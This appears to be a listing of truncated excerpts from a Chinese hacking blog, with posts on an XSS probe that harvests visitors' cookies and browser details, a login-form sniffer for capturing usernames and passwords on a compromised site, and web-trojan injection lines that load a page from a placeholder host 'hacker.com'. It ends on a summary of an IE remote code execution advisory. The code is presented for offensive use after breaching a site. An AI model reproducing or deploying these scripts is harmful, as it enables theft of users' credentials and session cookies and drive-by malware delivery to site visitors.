eT48_Sec

重复造轮子，是的，我在学习编程。 该 javascript 脚本主要收集客户端用户的 User_Agent、Cookie、Domain、Flash_Version。 接收信息的文件由PHP编写，同时增加客户端的IP和访问时间。 xss_probe.js /* xss_probe by eT48 */ var http_server = "http://www.hacker.c

version 1.0 需要代码添加到登陆表单的后面，才可以正常使用。 经完善后，可以添加在任何位置，比如 标签里，而不必添加在登录表单的后面。 sniffer.js /* author: eT48 blog: http://blog.youkuaiyun.com/et48_sec version: v1.5 */ document.onreadystatechange = function()

一段截获登录表单的用户名和密码的Javascript脚本。 拿下了网站的数据库却破不了MD5的情况下，可以尝试利用这段脚本截获登录表单的用户名和密码。 这段脚本需要调用到DOM，所以应把这段代码插在登录表单之后。 sniffer.js /* author: eT48 blog: http://blog.youkuaiyun.com/et48_sec version: 1.0 */ va

我觉得网页挂马要考虑两个因素：隐蔽性、成功率。 我们只需保证浏览器加载并执行我们构造的特殊网页即可，这样的方法有许多。 方法一，我们可以在首页加入以下这行代码。 方法二，我们可以在首页加入以下这行代码。 horse.js可以这样写： new Image.src="http://www.hacker.com/horse.html"; 或者 d

原文：https://technet.microsoft.com/zh-CN/library/security/ms14-065.aspx 当用户使用 Internet Explorer 查看经特殊设计的网页时允许远程执行代码。 成功利用这些漏洞的攻击者可以获得与当前用户相同的用户权限。 Windows 7（32 位/64位）Service Pack 1 上的 IE8、